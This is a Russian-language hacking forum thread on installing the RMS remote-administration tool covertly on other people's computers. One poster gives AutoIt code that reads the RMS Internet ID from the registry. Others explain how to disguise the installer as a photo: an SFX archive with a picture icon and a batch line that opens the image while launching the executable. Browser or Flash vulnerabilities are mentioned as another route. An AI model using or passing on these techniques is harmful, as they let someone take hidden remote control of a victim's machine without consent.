• Обратная связь: [email protected]

Наш канал в telegram: https://t.me/ru_sfera

Группа VK: https://vk.com/rusfera

Пользователи могут писать на форуме ТОЛЬКО ЧЕРЕЗ 7 ДНЕЙ после регистрации

RMS - полностью скрытая установка и управление.

shtraus

Пользователь
Форумчанин
здрасти
вот ведь может быть например, есть утилиты генераторы сборок, вот с генерирую я сборку через такую утилиту а может быть такое что хозяин сборки тот который создал эту утилиту как то тоже все види то есть id и пароль сборки, ну например в этой утилите встроенная функция только хозяину сборки известная которая параллельно с вами и ему отправляет все данные и получается он может тоже подключится к тому компьютеру где установлена сборка с генерированная с помощью его утилиты генератора сборок?

вот я почитала тут на форуме разные вещи и подумала ведь не может быть чтобы кто то так просто тут скинул нормальную программу

и еще если можно, вот например я создала сборку виде картинки и потом загрузила эту картинку на хостинг и потом дам ссылку человеку и если он нажмет на эту ссылку то rms установится буд то человек котрыл фотку у себя на компьютере, или такой вариант не работает, или может можно использовать что то похожее например дал ссылку потом человек нажал и все rms установился?

Последнее редактирование:

shtraus

Пользователь
Форумчанин
понятно, никто не хочет со мной возится так я уже многое научилась, совсем немного осталось пару деталей

Nodarius

Пользователь
Форумчанин
Функция парсит Id-шник из реестра , написанно на 'недо' яп Autoit

Func GetId()
$sPath = RegRead('HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System\Server\Parameters' ,'InternetId')
$sResult = __HexToString($sPath)
$sResult = StringReplace($sResult , '"', '*')
$sResult = StringReplace($sResult , '<?xml version=*1.0* encoding=*UTF-8*?>', '')
$sResult = StringReplace($sResult , '<rms_internet_id_settings version=*63006*><internet_id>','')
$sResult = StringReplace($sResult , '</internet_id><use_inet_connection>true</use_inet_connection><inet_server>','')
$sResult = StringReplace($sResult , '</inet_server><use_custom_inet_server>false</use_custom_inet_server>','')
$sResult = StringReplace($sResult , '<inet_id_port>5655</inet_id_port><use_inet_id_ipv6>false</use_inet_id_ipv6></rms_internet_id_settings>','')
Return $sResult
EndFunc

Func __StringToHex($sString)
Return Hex(StringToBinary($sString))
EndFunc

Func __HexToString($sString)
If StringLeft($sString, 2) <> '0x' Then $sString = '0x' & $sString
Return BinaryToString($sString)

X-Shar

:)
Администрация
Отпиши в вк id272513249 , поясню за все. Или в skype , логин phpточкаgod (сижу редко).
Здесь на форуме пояснить нельзя ?Dmeh-Smeh-Smeh!!!

Нам тоже интересно, зачем регится на форуме если нехотите здесь общаться ?

Общайтесь и дальше во VK, смешно...Отдыхай!!!

X-Shar

Администрация
понятно, никто не хочет со мной возится так я уже многое научилась, совсем немного осталось пару деталей
Ну странные вопросы, понятно что в сборке могут-быть трояны, поэтому нужно юзать свою сборку, или проверять...

Про:
и еще если можно, вот например я создала сборку виде картинки и потом загрузила эту картинку на хостинг и потом дам ссылку человеку и если он нажмет на эту ссылку то rms установится буд то человек котрыл фотку у себя на компьютере, или такой вариант не работает, или может можно использовать что то похожее например дал ссылку потом человек нажал и все rms установился?
Тут нужно юзать уязвимости браузера или флеш...Не въехал!!!Не въехал!!!Не въехал!!!

Nodarius

Пользователь
Форумчанин
Ну странные вопросы, понятно что в сборке могут-быть трояны, поэтому нужно юзать свою сборку, или проверять...

Про:

Тут нужно юзать уязвимости браузера или флеш...Не въехал!!!Не въехал!!!Не въехал!!!
Ой ну ты крепко стукнул браток , логические экзекуции не мой конек .

Nodarius

Пользователь
Форумчанин
Конвертируешь картинку в *.ico , создаешь sfx архив , пихаешь туда картинку , *.exe , *.bat-ник , со следующим кодом ''start picturname.jpg start proggname.exe' , присваиваешь свежеконверт. иконку , готово , почти.

X-Shar

Администрация

Nodarius

Пользователь
Форумчанин
Курите
Спасибо , с моим синдромом 'Гсм' ака «гуманитарный склад мышления» , весьма полезная статейка , прочту на досуге.

dencikkkk

Пользователь
Форумчанин
Конвертируешь картинку в *.ico , создаешь sfx архив , пихаешь туда картинку , *.exe , *.bat-ник , со следующим кодом ''start picturname.jpg start proggname.exe' , присваиваешь свежеконверт. иконку , готово , почти.
ток расширение от этого .exe )))

Верх Низ